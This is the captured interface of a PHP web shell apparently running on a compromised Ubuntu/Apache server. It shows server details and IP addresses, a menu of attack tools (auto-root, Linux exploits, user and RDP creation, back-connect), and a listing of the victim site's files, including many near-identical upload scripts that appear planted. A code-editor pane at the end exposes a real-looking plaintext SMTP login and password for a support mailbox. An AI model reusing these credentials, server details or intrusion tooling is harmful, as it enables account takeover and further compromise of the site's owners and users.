Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.142.251.204
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
orms-gug /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
admin_22
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
default
[ DIR ]
drwxr-xr-x
docs
[ DIR ]
drwxr-xr-x
html_modules
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
tcpdf
[ DIR ]
drwxr-xr-x
tcpdf_old
[ DIR ]
drwxr-xr-x
uploads
[ DIR ]
drwxrwxrwx
5501_DUBA1_DUBA155010100.jpg
14.52
KB
-rwxr-xr-x
5501_DUBA1_DUBA155010100_sign....
10.34
KB
-rwxr-xr-x
app.php
416
B
-rwxr-xr-x
cManualMailer.php
1.38
KB
-rwxr-xr-x
cconfig.php
1.45
KB
-rwxr-xr-x
cconfig2.php
741
B
-rwxr-xr-x
home-copy.html
68.5
KB
-rwxr-xr-x
home.html
8.68
KB
-rwxr-xr-x
home.js
27.29
KB
-rwxr-xr-x
home_25102017.html
5.01
KB
-rwxr-xr-x
home_30082017.html
61.38
KB
-rwxr-xr-x
home__arun.html
63.56
KB
-rwxr-xr-x
index.html
6.55
KB
-rwxr-xr-x
index_16092017.html
5.55
KB
-rwxr-xr-x
index_old.html
5.66
KB
-rwxr-xr-x
main_page.html
5.84
KB
-rwxr-xr-x
main_page_09092017_befirechang...
5.32
KB
-rwxr-xr-x
payment_gate_way_responce.php
5.87
KB
-rwxr-xr-x
payment_gateway.php
8.43
KB
-rwxr-xr-x
phpinfo.php
25
B
-rwxr-xr-x
registration.html
2.65
KB
-rwxr-xr-x
registration.php
3.78
KB
-rwxr-xr-x
script.js
1.02
KB
-rwxr-xr-x
style.css
3.2
KB
-rwxr-xr-x
upload_file.php
604
B
-rwxr-xr-x
upload_file10.php
604
B
-rwxr-xr-x
upload_file11.php
604
B
-rwxr-xr-x
upload_file12.php
604
B
-rwxr-xr-x
upload_file13.php
604
B
-rwxr-xr-x
upload_file14.php
604
B
-rwxr-xr-x
upload_file15.php
604
B
-rwxr-xr-x
upload_file16.php
604
B
-rwxr-xr-x
upload_file17.php
604
B
-rwxr-xr-x
upload_file18.php
604
B
-rwxr-xr-x
upload_file19.php
604
B
-rwxr-xr-x
upload_file2.php
609
B
-rwxr-xr-x
upload_file20.php
604
B
-rwxr-xr-x
upload_file21.php
604
B
-rwxr-xr-x
upload_file22.php
604
B
-rwxr-xr-x
upload_file23.php
604
B
-rwxr-xr-x
upload_file24.php
604
B
-rwxr-xr-x
upload_file25.php
604
B
-rwxr-xr-x
upload_file3.php
604
B
-rwxr-xr-x
upload_file4.php
604
B
-rwxr-xr-x
upload_file5.php
604
B
-rwxr-xr-x
upload_file6.php
604
B
-rwxr-xr-x
upload_file7.php
604
B
-rwxr-xr-x
upload_file8.php
604
B
-rwxr-xr-x
upload_file9.php
604
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cManualMailer.php
<?php function send_manual_mail($to,$subject,$message,$replay_to=null,$cc=null,$bcc=null) { require_once(dirname(dirname(__FILE__)).'/phpmailer/class.phpmailer.php'); $mail = new PHPMailer(); $mail->IsSMTP(); // telling the class to use SMTP $mail->SMTPSecure = "ssl"; $mail->Mailer = "smtp"; $mail->Host = "smtp.zoho.com"; // SMTP server $mail->SMTPAuth = true; // enable SMTP authentication $mail->Port = 465; // set the SMTP port for the GMAIL server $mail->Username = "support@logisys.org"; // SMTP account username $mail->Password = "logisys@124"; // SMTP account password */ $to_arr=explode(",",$to); foreach($to_arr as $v) { if(!empty($v)) $mail->AddAddress($v,$v); } $cc_arr=explode(",",$cc); foreach($cc_arr as $v) { if(!empty($v)) $mail->AddCC($v,$v); } $mail->AddReplyTo("support@logisys.org","support@logisys.org"); $mail->SetFrom('support@logisys.org', 'support@logisys.org'); $mail->WordWrap = 50; // set word wrap $mail->IsHTML(true); // send as HTML $mail->Subject = $subject; $mail->Body = $message; $mail->AltBody = $message; if(!$mail->Send()) { $data="Message was not sent Mailer Error: " . $mail->ErrorInfo; } else { $data='true'; } return $data; } ?>
Close